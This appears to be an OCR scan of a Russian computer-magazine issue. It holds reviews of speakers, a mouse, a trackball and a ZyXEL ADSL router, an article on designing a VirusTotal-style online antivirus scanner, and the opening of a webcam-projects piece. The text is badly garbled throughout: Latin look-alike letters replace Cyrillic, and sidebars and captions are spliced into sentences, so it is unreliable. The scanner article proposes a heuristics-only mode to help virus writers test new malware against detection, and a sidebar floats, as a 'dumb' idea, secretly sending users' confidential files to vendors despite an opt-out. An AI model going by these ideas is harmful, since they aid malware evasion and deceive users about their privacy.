Линейная частотная характеристика: 40 Гц~ 20 кГц 

Настройка уровня басов 

Разъем : І_іпе іп (линейный вход) 3,5 мм 

Кнопки включения/выключения и управления уровнем громкости располо- 
жены на проводном пульте ДУ 
Разъем для наушников на проводном пульте ДУ 




1. Стильный и элегантный дизайн колонок впишется в любой интерьер. 

2 . Магнитноеэкранированиеубережет от электромагнитных искажений на 
мониторе. 

3. Управление колонками и сабвуфером осуществляется с проводного 
пульта, к которому также можно подключить наушники. 

4 . Компактный сабвуфер хорошо воспроизводит басы и незапираетих на 
максимальной громкости. 

5 . Динамики четко воспроизводят звук — искажений не замечено даже на 
максимуме. 

6 . Общей громкости колонок достаточно для небольшой комнаты. 

7 . Подключение к источнику звука осуществляется кабелем со стандарт- 
ными разъемами тіпі^аск. Прижелании провод можно заменить более 
длинным. 

0 

1. Поверхность колонок отлично хранит отпечатки пальцев и притягивает 
пыль — придется их частенько протирать. 

2 . Входящий в комплект кабель для подключения к источнику звука может 
оказаться коротковат (особенно, если системный блокустановлен под 
столом). 
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Геггит 




Мышь-трансформер 



Технические характеристики: 

Интерфейс: 115В 
Разрешение: 800/1600 сірі 
Органы управления: 

Мышь: 2 клавиши и колесо прокрутки 

Геймпад: джойстик, 8 программируемых кнопок, клавиши «Турбо»/ 
«Сіеаг» 

Цвет: Серебристо-черный 




1. Компактная мышьлегко помещается влюбую сумку с ноутбуком. 

2. Оптический сенсор обладает разрешением от 800 до 1600 Орі.Хватити 
для работы, и для игр! 

3. Мышь-раскладушка может выступать в роли стандартного джойстика, 
знакомого всем по игровым консолям. 

4. Дополнительные кнопки на боковых сторонах активируются при перево- 
де мыши в «игровое» положение. 

5. Восемь программируемых кнопок — удобно и эффективно. 

6 . Подключение по шине У5В избавит от необходимости в переходниках. 

7. Кнопки мыши и колесо прокрутки блокируются при раскрытии «раскла- 
душки». 

Ѳ 

1. В разложенном состоянии джойстик неровный, что вызывает некоторое 
неудобство. 

2. Механизм, соединяющий две половинки мыши, выполнен из пластмас- 
сы — при активной игре мышь можно и поломать. 

3. Нетаналогового джойстика — движения в играх не будут плавными. 



Сепіи» 

Тгаѵеіег 350 

Мобильный трекбол 



Техническиехарактеристики: 

Тип: Проводной трекбол 

Интерфейс: 115В 

Органы управлениям клавиши и колесо прокрутки, 2 функциональные 
клавиши 

Цвет: Серебристо-черный 




1. Трекбол, по сравнению с мышью, при работе не требует много места 

— это важно при дефиците пространства и в дороге. 

2. Специальное крепление с присоской позволит разместитьтрекбол на 
панели ноутбука. 

3. Наклон механизма крепления в одной плоскости обеспечиваетудобное 
положение руки. 

4. Девайс может быть использован как правшами, так и левшами — режим 
работы переключается всего одной кнопкой. 

5. Дублирование кнопок дает возможность быстрой и комфортной работы с 
устройством. Пригодится и наличие колеса прокрутки. 

6 . Разматывающийся кабель решает проблему болтающихся проводов 

— достаточно вытянуть столько, сколько нужно. 

0 



1. Крепление трекбола к присоске не отличается надежностью — наблюда- 

2. Стрекболом, в отличие от мыши, особо не поиграешь (хотя он удобнее 

ТЕ5Т_і_АВ ВЫРАЖАЕТ БЛАГОДАРНОСТЬ ЗА ПРЕДОСТАВЛЕННОЕ П р И работе с ноутбуком, лежащим на коленях]. 

НАТЕСТИРОВАНИЕ ОБОРУДОВАНИЕ РОССИЙСКИМ ПРЕДСТА- 3. Колесо прокрутки снабжено очень малым ходом и никак не страхует от 

ВИТЕЛЬСТВАМ КОМПАНИЙ 0ЕЫШ5, СКЕАТІѴЕ И ВКОТНЕК ненужного выделения или вызова функции при случайном нажатии. 
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Теггигм 




Победа 



в борьбе 



за скооость 



Тестирование двухдиапазонного 
А05І. интернет-центра 2уХЕЬ 
Р660НТѴѴ2 ЕЕІ 



АЛЕКСЕЙ ШУВАЕВ 



Еще недавно у пользователей АОЗЬ, обладающих охранно-пожарной сигнализа- 
цией, или, наоборот, отказывавшихся от нее, а также тех, кто в силу различных 
причин менял место жительства, часто возникал такой не очень приятный мо- 
мент, как необходимость покупки практически такого же модема, но с поддерж- 
кой другого Аппех-стандарта. Но недавно проблема была решена. 



ействительно, кому захочется переплачивать вдвое за более 
дорогиетарифы с сигнализацией, если последняя попросту 
не используется? Наверное именно поэтому компания 2уХЕ1_ 
решила выпустить универсальный двухдиапазонный интер- 
нет-центр Р660НТѴѴ2 со встроенным модемом А05І_2+. 

г ВОЗМОЖНОСТИ УСТРОЙСТВА 

Аккуратная коробочка скрывает в себе не только А05І_-модем (построен- 
ный, кстати, на новой платформе АЬзоІійе А05І_, что, по-видимому, озна- 
чает поддержку любых вариаций стандарта], но также ѴѴі-Рі точку доступа, 
роутер и коммутатор с возможностью подключения до четыре сетевых 
устройств. Чтобы не переживать за сохранность данных, передаваемых по 



беспроводной сети, ты можешь включить аутентификацию и шифрование, 
благо поддерживается даже ѴѴРА2-Р5К. 

Настройку сети можно смело доверить утилите ЫеіРгіепсІ. В случае затруд- 
нений при поиске устройства — просто обнови версиюутилиты, скачав 
свежую версию с гѵхеі.ги . и проблемы исчезнут. Эта утилита настроиттвой 
Зухель для работы с большинством А05І_-провайдеров, и тебе останет- 
ся только выбрать город, тариф и ввести логин и пароль. С передачей 
данных интер нет- центр справляется отлично: есть автоматический выбор 
скорости в зависимости от качества связи, увеличение скорости передачи 
данных к провайдеру с 1 до 3,5 Мбит по стандартуАппех М и увеличение 
«последней мили» до 7 км по стандартуАппех І_. 

Крометого, распространение цифрового телевидения, особенно 
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Те г гиги 




Я-** 

Настройка подключения в программе 2уХЕБ ЫеТЕгіепсі: выбор провайдера 
и услуги 




□тпі 

Цр»М* 1#*і« 

Диалогпрограммы 2уХЕБ ЫеТРгіепсІ: выбор типа телефонной линии 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ 

• 1 разъем Ю-іі для подключения к телефонной линии 

• 4 разъема К.І-45 ЕТНЕКЫЕТ І10ВА5Е-Т/100ВА5Е-ТХІ с 
автоопределением типа кабеля 

• АР5І.2+ (С. 992. 5) 

• Поддержка Аппех А, Аппех В, Аппех М, Аппех Ь (РЕ 
А05Ц 

• Шлюз прикладного уровня 5ІР (5ІР А1.0) 

• Транзит ѴРЫ-соединений ІІРБес, РРТР, І.2ТР), РРРоЕ- 
соединений 

• Беспроводная точка доступа стандарта 802.1 1 Ь/д 

• Аутентификация по протоколам: ІЕЕЕ 802.1Х/ѴѴРА/ 
ѴѴРА-Р5К/ѴѴРА2 /Ѵ/РА2-Р5К 

• ѴѴЕР-шифрование 64/128/256 бит 

• Защита сети: Межсетевой экран с контролем устанав- 
ливаемых соединений І5РІ) 

• Защита от Оо5- и ОБоЗ-атак из интернета 

• Уведомление при обнаружении сетевой атаки и ее 
регистрация в журнале 

• Управление: ЫеІРгіепіІ, Веб-конфигуратор, ТЕЬЫЕТ, 
5ЫМР, РТР/ТРТР 

• Размерыивох 128x36 мм 

• Масса: 350 г без адаптера питания 



ІРТѴ, не осталось незамеченным инженерами компании. Утилита 
ЫеТРгіепсІ поможет и в этом — тебе достаточно указать, к какому пор- 
ту будет подключена приставка. Конечно же, роутер интернет-центра 
умеет транслировать адреса ( N АТ ) , поэтому ты сможешь «спрятать» 
несколько компьютеров от провайдера, а также организовать свои 
сервера. А благодаря поддержке сервиса ОупОЫЗ, ты сможешь 
сделать их доступными через интернет для своих друзей или всех 
желающих. 

г ТЕСТИРОВАНИЕ 

Понятно, что скорость доступа в интернету каждого обладателя Р660НТѴѴ будет 
своя —тут играют роль тарифный план провайдера и качество линии от АТС до 
твоей квартиры, поэтомутестировать втепличныхусловиях интер нет- центр 
было не интересно. Мы решили проверить скорость доступа междулокальными 
компьютерами. Для этого мы подключили к 2уХЕЕР660РИѴѴ2 посредством про- 
водов два компьютера и ноутбук по ѴѴі-Рі. При помощи утилиты, измеряющей 
скорость передачи данных, мы замерили реальную пропускную способность и 
обратили внимание на загрузку процессора интер нет- центра. Результаты до- 
вольно интересные: при передаче данных по проводному каналу скорость была 
чуть ниже, чем при прямом соединении компьютеров — порядка 90 Мбит/с. При 
этом загрузка процессора составляла всего 15-30%. При включении шифрова- 
ния процессор был загружен на 90-100%. 

г ВЫВОД 

Протестированный интер нет- центр будет интересен пользователям, чьи 
квартиры оснащены пожарной или охранной сигнализацией (или наоборот, 
не оснащены, но есть планы «оснаститься» в будущем), а также тем, у кого ка- 
чествотелефонной линии оста вляетжелать лучшего. Установка и настройка 
интер нет- центра не отнимет много времени, а благодаря утилите ЫеТРгіепсІ 
пользователю остается только выбрать провайдера, услуги и ввести в нужных 
полях аутентификационные данные. Быстро, просто и удобно. Если сетевые 
устройства и дальше будут развиваться в таком духе, то, возможно, скоро мне 
перестанут докучать подружки-блондинки с просьбой настроить интернет? 
2уХЕБ Р660НТѴѴ2 ЕЕ получает награду «Лучшая покупка», □с 



АЬзоІиІе АР5І 



Технология АЪзоІиГе АБ5Ь, которая нашла применение в новых модемах 
и интернет-центрах 2уХЕЬ, имеет следующую особенность: девайсы, 
работающие по данному стандарту, обладают двухдиапазонным моду- 
лятором/демодулятором АП5Ь2 +, поддерживающим два частотных 
плана — для передачи по стандартам Аппех А и Аппех В. Проще говоря, 
интернет-центр сможет работать как на простой телефонной линии, 
так и на линии с охранно-пожарной сигнализацией или на цифровой 
линии І5П1М. В плюсы технологии смело можешь записывать: лучшую 
связь на проблемных линиях, возможность связи на дистанции до семи 
километров (технология Аппех Ь), лучшую помехозащищенность, 
увеличение скорости передачи данных к провайдеру с 1 Мбит/с до 3,5 
Мбит/с. Самое приятное, что все сетевые устройства 2уХЕЬ, постро- 
енные на новой платформе, поддерживаются программой МегРгіепсІ. 
Настройка при помощи данного софта сводится к нескольким щелчкам 
мыши и вводу уникальных логина и пароля — остальные настройки 
полностью автоматизированы. 
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Появивша яся некогда идея провер ять файл ср азу по многим антивир усам ока- 
залась очень удачной. Онлайновая ^^^^^^:ная служба шшш.ѵігизшіаГсот 
имеет тысячи посещений ежеднев^^^^^этом обладая дюжиной недостат- 
ков. Серви с не раскрывает своих секретов, однако автор давно раз обрал его 
по винтикам и теперь работает над улучшенной реализацией.’ 



□ то время какодни пользователи держат і- 

зоопарк различных антивирусов, конфликтующих друг с 
другом и тормозящих ПК (не говоря уже о стоимости лицензий 
или сложности поиска правильного «лекарства»), хакеры 
предпочитают ловить малварь самостоятельно. В крайнем случае — про- 
веряют подозрительные файлы на бесплатных онлайновых службахтипа 
того же ѵѵѵѵѵѵ.ѵігизіоіаі.сот . Эти же службы используются для «обкатки» 
вирусов собственного написания на предмет обнаружения эвристически- 
ми анализаторами. И хотя, если верить блогу Евгения Касперского ( ѵѵѵѵѵѵ. 
ѵігивІізЕсот/еп/ѵѵеЫоа ). хакеры не доверяютѵігиз-ІоІаГу, поскольку он 
передает подозрительные файлы антивирусным компаниям и вирусы начи- 
нают палиться еще на старте, эта точка зрения отражаетлишь малую часть 
действительности. Да, действительно, профессиональные разработчики 
атакующих программ и гооЕкН'ов проверяют их на «вшивость» исключи- 
тельно локальным способом на своих собственных машинах, предотвращая 
утечку информации, но... профессионалов единицы, к тому же эксперимен- 
тируя с ѵігиз-іоіаі’ом, хакеры определяютобщие критерии ругательства 
антивирусов, выявляя последовательности машинных команд/вызовов 
АРІ-функций, приводящих ксрабатыванию эвристического анализатора. 
Однажды «обломав» антивирус, хакер может многократно использовать 
найденный способ обхода эвристика. Достаточно посетить любые форумы, 
где обитают вирусописатели, чтобы убедиться, что они весьма неравнодуш- 



гивно его используют. 

А что если создать еще более качественный сервис? Ведьѵігиз-Іоіаі при- 
митивен до ужаса — качество сканирования оставляетжелать лучшего, не 
говоря уже о длинных «социалистических» очередях, в которых приходится 
подолгу простаивать из-за частых перегрузок сервера (а все потому, что ба- 
лансировка нагрузки и оптимизация изначально не предусматривались!). 
На момент написания этих строк, мыщъх по заказу одной антивирусной 
компании (имя которой разглашать не вправе) руководит разработкой 
онлайнового сервиса, рассчитанного на «магистральную» загрузку и 
предоставляющего пользователям кучу всевозможных рычагов управле- 
ния. Естественно, исходный код к статье не прилагается, да он и не нужен, 
главное — это концепт, плюс некоторые неочевидныетонкости, с которыми 
придется столкнуться при «промышленных» масштабах эксплуатации. 
Естественно, это требует широких сетевых каналов, мощных многопро- 
цессорных систем и еще кучу всего. Словом, без солидных финансовых 
вложений тут никак не обойтись. Однако никто не заставляет нас создавать 
сервис планетарного масштаба и, если постараться, можно вполнеуло- 
житься в бюджет $2000 или даже меньше. Нам потребуется интернет-канал 
с безлимитным тарифом, чтобы злые люди не кинули нас на входящий тра- 
фик, который будет весьма значительным. В качестве компьютера вполне 
подойдетмашина с процессором Соге20ио и парой гигабайтоперативной 
памяти. О проблемах с лицензированием антивирусов мы поговорим в 



► 026 
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одноименной врезке, а пока отметим, что никаких особых про- 
граммистских навыков не понадобится. Подойдетлюбой язык 
(Си, Регі. РНР] и минимальный опыт работы с СѲІ (пользуясь 
случаем, хочу порекомендовать библиотеку С6ІС). 

г ѴІКУ5-Т0ТАІ- ИЗНУТРИ 

Ѵігиз-Іоіаі устроен не просто, а очень просто. Он использует 
консольные версии антивирусов, управляемые посредством 
командой строки и выдающие результатсканирования в 
стандартный проток вывода, который легко перенаправить в 
файл или пайп (ріре). 

Что мы делаем? Через специальную форму на сайте закачива- 
ем «подопытный» файл, скармливаем его антивирусу, пред- 
варительно перенаправив вывод во временный файл/пайп, 
которыйтутже парсим (то есть выбрасываем все лишнее, 
оставляя только статус проверки и имя вируса). Парсить вывод 
легче всего Регі’ом, поддерживающим мощный механизм 
регулярных выражений, но Си-программы намного более 
производительны, а потому предпочтительнее (особенно, при 
большом наплыве пользователей). 

На этом, собственно говоря, возможности ѵігиз-ІюІаГа и 
заканчиваются. Это создает большие проблемы: во-первых, 
далеко не все антивирусы имеют консольные версии, а, во- 
вторых, даже те, что имеют, поведением зачастую радикально 
отличаются отполноценных 6111-версий. В чем легко убедить- 
ся, сравнив результаты сканирования большой коллекции 
вирусов локальным способом и через ѵігиз-іоіаі — сравнение 
будет отнюдь не в пользу ѵігиз-ІюІаГа. 

Учитывая, что практически все антивирусы (и 6111-версии в 
том числе) поддерживаютзапись результатов сканирования в 
Іод-файл и позволяютзадавать имя сканируемого файла через 
командную строку или, на худой конец, через механизм йОЕ 
(Оупатіс Оаіа ЕхсЬапде), ничего не стоит прикрутить 6111-вер- 
сию конлайновой службе. Просто «скармливаем» антивирусу 
файл, форсируем запись результатов сканирования в Іод- 
файл, который парсимтакже, каки вывод консольных версий. 
Остается только собрать «показания» всех имеющихся в 
нашем распоряжении антивирусов, оформить их в виде 
НТМІ_-таблицы и выдать на экран, что по силам даже самым 
начинающим программистам. 

В клинических случаях, когда антивирус начисто игнори- 
рует командную строку или не умеет вести логи, на помощь 
приходит механизм ѴѴіпсіоѵѵз-сообщений (ѴѴіпсІоѵѵз Меззаде 
или, сокращенно, ѴѴМ). Посылая ѴѴМ-сообщения элементам 
управления антивируса, мы можем манипулировать кнопками, 



меню и прочими элементами управления по своемуусмотре- 
нию. Аналогичным способом извлекается и содержимое окна, 
содержащего результаты проверки. Получив форматирован- 
ный гісб-текст или ріаіп-текст, пропускаем его через парсер 
— и все! 

^ МАЛЕНЬКИЕ СЕКРЕТЫ БОЛЬШИХ СЕРВЕРОВ 

При попытке реализации вышеописанной модели неизбежно 
всплывут проблемы удручающе низкой производительно- 
сти. Но мы не боимся трудностей и начнем щемить их одну 
за другой. Первое и очевидное. Как показывает статистика, 
различные пользователи преимущество проверяют одни и те 
же файлы, как правило, принадлежащие ѴѴіпсІоѵѵз или попу- 
лярным программным пакетам. Чтобы сократить накладные 
расходы, рекомендуется подсчитывать контрольную сумму 
файла перед его проверкой и, если такой файл уже проверял- 
ся ранее, выдавать уже готовые результаты сканирования, 
сохраненные в базе данных. На первый взгляд, в реализации 
алгоритма нет ничего сложного, но тут притаилось немало 
подводных камней. Вот наиболее актуальные: 

• антивирусные базы обновляются постоянно и потому даже 
за короткий промежуток времени информация о сканиро- 
вании безнадежно устаревает. Следовательно, необходимо 
вместе с контрольной суммой сохранять и дату последнего 
времени сканирования (отображая ее пользователю), а также 
предусмотреть кнопочку «гезсап»; 

• использование алгоритма СРС32 может показаться плохой 
идеей, посколькуон выдает множество коллизий (разные 
файлы имеют идентичные контрольные суммы), ктомуже его 
легко подделать, модифицировав любое количество байт 
файла и затем скорректировав 4 байта так, чтобы скомпенси- 
ровать искажения. Однако СРС32 шустро работает, обгоняя 
М05 и другие хорошие алгоритмы. Поэтому возникает идея: 
для каждого файла, прогоняемого через антивирусы, мы 
генерируем СПС32 и ІѵЮ5 (сучетом времени сканирования 
накладными расходами на расчет контрольной суммы можно 
пренебречь), а при последующей проверке залитого пользо- 
вателем файла сначала проверяем СРС32 (проверяется очень 
быстро) и, если такой контрольной суммы в нашей базе нет, 
Мй5 можно и не вычислять — зачем? Ведь и так видно, что 
файл еще не проверялся; 

• многие «честные» файлы (особенно входящие в состав 
операционной системы) снабжены цифровой подписью или 
их целостность может быть проверена путем обращения к 
серверам МісгозоЙ, что осуществляется намного быстрее ан- 



Проблемы 

конфиден- 

циально- 

сти 

Вирусы встречаются не только в про- 
граммах, но и в офисных документах, 
РБР’ах и прочих файлах с конфиден- 
циальной информацией, разглашать 
которую крайне нежелательно, поэто- 
му необходимо предусмотреть опцию 
«не отсылать данный файл в антиви- 
русные центры», при необходимости 
взводимую пользователем. Техниче- 



ски это реализуется проще простого, 
но. . . как избежать злоупотреблений? ! 
Особенно, если мы строим наш бизнес 
на отправке свежих штаммов разра- 
ботчикам антивирусов? 

Идея первая (тупая до безобразия) 

— наплевать на все приличия и отсы- 
лать файлы в антивирусные центры не- 
зависимо от состояния каких-то там га- 
лочек. Главное: создать у пользователя 
иллюзию, что его конфиденциальность 
строго блюдут, ну а что происходит 
на самом деле, он все равно не узнает. 
Ну. . . до тех пор, пока тайное не станет 
явным и не разразится скандал, идущий 
совсем не на пользу нашему ресурсу. 
Идея вторая — поддерживать эту 
опцию только для пользователей, 



открывшим у нас счет. Кстати, это 
представляет собой нехилую моти- 
вацию для оплаты услуг, особенно 
с учетом того, что о конфиденци- 
альности в основном беспокоятся 
корпоративные пользователи, 
привыкшие платить за услуги (в 
отличие от домашних юзеров, тяго- 
теющих к халяве вне зависимости от 
стоимости полнофункционального 
аккаунта) . 

Идея третья — файл все-таки отправ- 
лять, но перед этим удалять всю тек- 
стовую и графическую информацию, 
что не противоречит ни логике, ни 
здравому смыслу, ни даже соглаше- 
нию, заключенному с пользователем 
нашего сервиса. 




> іп^о 

Сервисы, подоб- 
ные ѵігизіоіаі.сот, 
распространены в 
хакерских кругах. 
Ссновное их отличие 
— приватность. Сни 
никогда не отправ- 
ляют обработанные 
файлы в антивирусные 
центры (гарантируя 
непопадание малвари 
в антивирусные 
базы), но за каждую 
проверку взимают 
небольшую плату. 

О других хакерских 
сервисахты можешь 




> ѵѵагпіп 



Антивирусные пакеты 
зачастую несовмес- 
тимы между собой. 

Но, как правило, 
несовместимы про- 
активные защиты и 
мониторы, работаю- 
щие в реальном вре- 
мени, вто время как 
статические сканнеры 
(а именно они нам и 
нужны) отлично функ- 
ционируют в одной 
системе. 
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Внешний вид утилиты РЕЮ, определяющийтип и версиюупаковщика/ 
протектора исполняемых файлов 



тивирусного сканирования, и раз поданным МісгозоЙ, файл не изменен, 
зачем его прогонять через антивирусы?! 

Также крайне желательно реализовать опцию, позволяющую поль- 
зователю выбирать режим сканирования с эвристикой и без (чего не 
сделано на ѵігиБіоІаІ). Эвристика представляет собой довольно затратную 
по времени и ресурсам ЦП операцию, но далеко не все пользователи 
доверяют полученным результатам и хотят видеть имя конкретного вируса 
(если он есть), а не расплывчатое предупреждение, обычно ругающееся 
на упаковщик/протектор, которым обработан честный файл. С другой сто- 
роны, вирусописателям совершенно неинтересно сканирование по базе 
(так кактолько что написанного вируса там заведомо нет) и они предпочли 
бы задействовать только эвристику, экономя тем самым ресурсы нашего 
сервера. Такпочему бы не пойти им навстречу? 

Закачка больших файлов предоставляет серьезную проблему, имеющую 
несколько решений. Самое простое (и глупое) — установить верхний 
предел закачиваемого файла в пару мегабайт (или околотого), чуть-чуть 
умнее: лимитировать суммарный размер всех файлов, закачанных за су- 
тки с одного ІР (но тут возникает проблема определения ІР, поскольку очень 
часто мы будем видеть не ІР пользователя, а ІР прокси сервера провайде- 
ра). Полезно рекомендовать юзерам сжимать файлы перед отправкой гір’ом 
или другим популярным архиватором для уменьшения нагрузки на канал 
или делать это автоматически на клиентской стороне специальным скрип- 
том. Наконец, за сканирование больших файлов можно взимать деньги, но 
об этом мы поговорим чуть позже, а пока продолжим тему оптимизации. 
Профилировка показывает, что львиная доля накладных расходов прихо- 
дится на запускантивируса, инициализацию его движка и загрузку антиви- 
русных баз. Перемещение антивирусов на виртуальный диск существенно 
увеличивает«подвижность» системы, но накладные расходы на создание 
новых процессов по-прежнему будут большими, поэтому мы используем 
0111-версии антивирусов и, путем эмуляции клавиатурного ввода, воздей- 
ствуем на элементы управления, заставляя их сканировать новые файлы и 
выдавать результат. При этом антивирус запускается всего один раз. Красо- 
та! Впрочем, можно реализовать и динамический алгоритм: при небольшой 
нагрузке на сервер о накладных расходах на порождение новых процессов 
можно не заботиться, а с ростом нагрузки — просто брать несколько файлов, 
закачанных пользователями за последние несколько минут и «скармли- 
вать» их антивирусу всем скопом, в результате чего количество запусков 
резко сокращается. Главное не запутаться, какой пользователь что закачал, 
но это уже мелочи технической реализации. 

Естественно, сканирование лучше запускать на всех антивирусах па- 
раллельно, а не последовательно и вместо того, чтобы «тупо» запрещать 
пользователю закрывать окно браузера до окончания процесса скани- 
рования (как это делает ѵігиз-іоіаі), отсл ежи вать ТС Р/ІР соединение и 
при его обрыве автоматически «выбрасывать» файл, принадлежащий 
данному пользователю, из очереди на сканирование. Плюс реализовать 
стандартную кнопку «отмены» (также отсутствующую у ѵігиз-іоіаі’а) 

— если пользователь видит, что первыетри-четыре антивируса ничего не 
находят, так следует ли дожидаться результатов проверки всех антивиру- 
сов? Особенно, если самые качественные антивирусы поставить вперед 
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Знешний вид популярной онлайновой антивирусной службы ѵігизіоіаі. 
Часть информации о внутреннем устройстве можно найти на ее же соб 
ственном блоге, но... гораздо интереснее спроектировать улучшенную 
версию онлайнового антивирусного сканера с чистого листа 






Юридические 

проблемы 

лицензирования 

Пользовательские соглашения (ЕІІЬА) на коммерческие антивирусы 
не разрешают использовать их в онлайновых сервисах без заклю- 
чения специальных контрактов, что вообще-то логично. Однако не 
стоит думать, что всякий контракт обязательно связан с необходимо- 
стью выплаты дополнительных отчислений. Вовсе нет! Достаточно 
проявить надлежащий дипломатический подход ! 

Крупные бренды заинтересованы в рекламе своей продукции и пото- 
му охотно разрешают использовать полнофункциональные версии 
антивирусов без всяких отчислений, поскольку конечный пользо- 
ватель реально видит, кто сосет, а кто нет. Правда, могут выдвинуть 
встречные условия типа сохранения логотипов, генерации ссылок на 
их сайты и т. д. Все это мелочи, решаемые в рабочем порядке. 

А что мелкие бренды? Они, конечно, понимают, что сравнение с 
конкурентами будет не в их пользу. Тут есть один очень интересный 
момент. Мелкие антивирусные компании страдают хронической не- 
хваткой свежих вирусов, которые попадают к ним в последнюю оче- 
редь, и потому онлайновый сервис, автоматически отсылающий уже 
детектируемые конкурентами вирусы — для них прекрасное средство 
пополнения вирусных баз и продвижения в различных рейтингах. С 
мелких брендов можно даже взимать плату за каждый новый вирус, и 
есть большая вероятность, что платить они согласятся! 

Короче говоря, лицензионные проблемы — это и не проблемы вовсе. 
А вот разных проволочек — предостаточно и нужно заранее быть го- 
товым к тому, что нас будут перебрасывать от одного ответственного 
лица (которое ничего не решает) к другому, третьему, и так по цепоч- 
ке. . . Это уже издержки цивилизации, против которых не попрешь. 
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остальных, выделив им максимальный приоритет ЦП. Как вариант, 
можно вообще не следить за ТСР/ІР сессий и при заливке нового файла 
назначать пользователю Ю задачи, который он может ввести в любое 
время, отключившись от Сети и повторно подключившись, например, 
через час, когда его очередь уже подошла. А можно рассылать результаты 
сканирования по е-таіі — тогда пользователь не будетскучать в ожида- 
нии своей очереди. 

И совсем не помешает прикрутить к нашему сервису утилиту вроде РЕЮ, 
определяющую тип и версиюупаковщика/проектора (правда, довольно 
часто ошибающуюся). И опционально реализовать распаковку набо- 
ром статических распаковщиков, работающих намного быстрее тех, что 
встроены в антивирусы. Тутесть один подводный камень — хотя 99% 
вирусов распознаются по распакованному дампу, некоторые, особо 
ленивые, сотрудники антивирусных компаний включают в базу сигнатуры 
упакованного файла, и после распаковки он перестает опознаваться как 
вирус. Однако, учитывая, что распакованный файл прогоняется через 
легион антивирусов, вероятность ложно-негативного срабатывания 
стремится к нулю. 

^ ЗАРАБАТЫВАЕМ ДЕНЬГИ ЛОПАТАМИ 

Миржестоки все в немупирается в деньги. На голом энтузиазме никой 
онлайновый сервис долго не продержится, поэтому приходится разраба- 
тывать нетолько программный код, но и жизнеспособную бизнес-схему. 
Рассмотрим возможные источники дохода. Первое — рост посещаемости 




При онлайновом антивирусном сканировании основная нагрузка ложится 
на подсистему ввода/вывода и оперативную память. Требования к мощ- 
ности процессора не столь значительны (антивирусы располагались на 
сестком диске и работали в режиме чистого сканера без эвристического 
нализатора) 



нашего сайта. На посещаемости, как известно, можно нехило заработать, 
особенно, если мы, например, продаем собственные защитные комплексы, 
предлагаем услуги по пен-тестингу и т.д. Онлайновый сервис привлекает 
клиентов намного активнее любых баннеров и, главное, привлекаетимен- 
нотот контингент, который нам нужен, следовательно, возросшие объемы 
продаж покроют все расходы на поддержку и обслуживание серверов, 
отплату трафика и т. д. 

Второе — отчисления отантивирусных компаний, чью продукцию мы 
рекламируем и кому передаем штаммы свежих вирусов. Тут, правда, 
много не заработаешь, поскольку лишь небольшая часть посетите- 
лей кликнет по ссылке «купить» антивирус, а стоимость вирусного 
штамма обычно составляет $1 (а то и меньше). Вот и считай, на ка- 
кой уровень посещаемости нужно выйти, чтобы окупить расходы на 
поддержку сервера, которые, кстати говоря, тем больше, чем выше 
посещаемость. 

Третье — взимать деньги непосредственно с самих пользователей. 

Хочешь подолгу стоять в очередях и сканировать файлы не больше чем ... 
мегабайт? Пожалуйста, пользуйся нашим сервисом бесплатно! Хочешь 
иметь определенные привилегии — будь добр заплатить. Главное, 
выбрать удобную схему оплаты. Здесь вам не Америка, здесь климат 
(финансовый) иной. Кредитные карты имеют единицы, электронные 
системы платежей только начинают набирать популярность. Зато прак- 
тически каждый ІТ-специалист — владелец сотового телефона, а значит, 
можно воспользоваться микро-платежами через 5М5 либо потребовать 
от клиента сообщить номер карты универсальной оплаты (перечислив 
заданную сумму на счет, который он может расходовать, когда поль- 
зуется нашим сервисом). Как показывает практика, сотовые платежи 
приносят наибольшую отдачу, поскольку телефоны распространен 
повсеместно, а сам процесс оплаты требует минимум телодви)* 

(что немаловажно) клиент практически ничем не рискует. , 
ными картами все намного сложнее и есть риск, что нече~ 
снимете них совсем нету сумму, какая ожидалась. Тоже 
микро- платежам через 5М5. Гарантий, что снимут 1 50 ■ 
клиента нет никаких. 



г А ЧТО В ИТОГЕ? 

Разумеется, в статье охвачены далеко не все проблемы, с к 
бежно столкнется всякий, попытавшийся воздвигнуть подоб 
вый сервис. Но задача выполнена — мыщъх предоставил вполй 
ную, отлаженную и работоспособную схему, которая скоро будет зап 
промышленную эксплуатацию. НЕ 
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Видеосигнализация. Система безопасности с распознаванием^^^^^г^з 
ление компьютером движением головы... Вот лишь некоторые результаты 



•наших безобидных экспериментов. Кто тут говорил, что веб-камера — без- 




еб-камера при всей своей простоте является девайсом 
продвинутым — позволяет получить картинку «в цифре» и в ре- 
альном времени. Мы решили проверить, на что она способна, 
и нашли несколько очень неожиданных применений. 



Н 1 . ДЕЛАЕМ БЕСПРОВОДНУЮ КАМЕРУ ИЗ ТЕЛЕФОНА ИЛИ КПК 

Для выполнения одного из заданий ночной игры йо 2 оР ( мѵѵѵѵ.сігггг.ги ] мне 
срочно понадобилась беспроводная \А/і-Рі камера. Игрушка оказалась не 
такой уж дешевой: Яндекс. Маркет однозначноуказывал, что меньше, чем за 
3000 руб., ее не найти. Болеетого, всем им необходимо постоянное питание 



от сети, а изобретать велосипед с самодельной аккумуляторной системой не 
хотелось. В поисках альтернативного решения пришла отличная идея, как 
можно самому изготовить беспроводную камеру. Раз уж в моем коммуни- 
каторе есть ѴѴі- Рі и двухмегапиксельная камера, почему бы не объединить 
их? Еще не начав копаться в документации ѴѴіпсіоѵѵб МоЬіІе, быстро нашел 
готовый продукт. Утилита ѴѴеЬСатега Ріиз ( ѵѵѵѵѵѵ.аіекзоіісот ] написана как 
на заказ: снимая изображения с камеры смартфона или коммуникатора, она 
пересылает их на комп (на специальную серверную часть). Можно переда- 
вать картинку по ѴѴі-Рі, ВІиеІооіЬ или даже ѲРР5 (не лучший вариант, мягко 
говоря) — в любом случае получается беспроводная веб-камера. Для пере- 
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О том, как сделать 
из камеры прибор 
ночного виденияты 
сможешь прочитать 
тут: \ллл/\л/.іп5Ігис1аЬІе5. 
сот/ісІ/Макіпд-а- 
ЫідЫі-Ѵізіоп-ѴѴеЬсат . 
Интересные на- 
работки в области 
распознавания лиц 
доступны на сайте 
радев, срзс.иса [дату. 
са/~Ьап[еп/ѵІ5Іоп/ 
іасеІіпкз.ЫітІ 
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Если тебя заин- 
тересовала тема 
беспроводных камер, 
могу посоветовать 
один рецепт. Вместо 
дорогостоящей ѴѴі-Рі 
камеры, у которой, к 
томуже, немаленькие 
размеры, можно ис- 
пользовать беспро- 
водную аналоговую, 
ценой в 1500 рублей. 
Приемник легко 
подключается кТѴ- 
тюнеру. Последнего 
если и нет, то его легко 
стрельнуть у друзей. 



дачи нужно лишь указать ІР-адрес компьютера, на котором ус- 
тановлена серверная часть. Надо добавить, что вместе с самой 
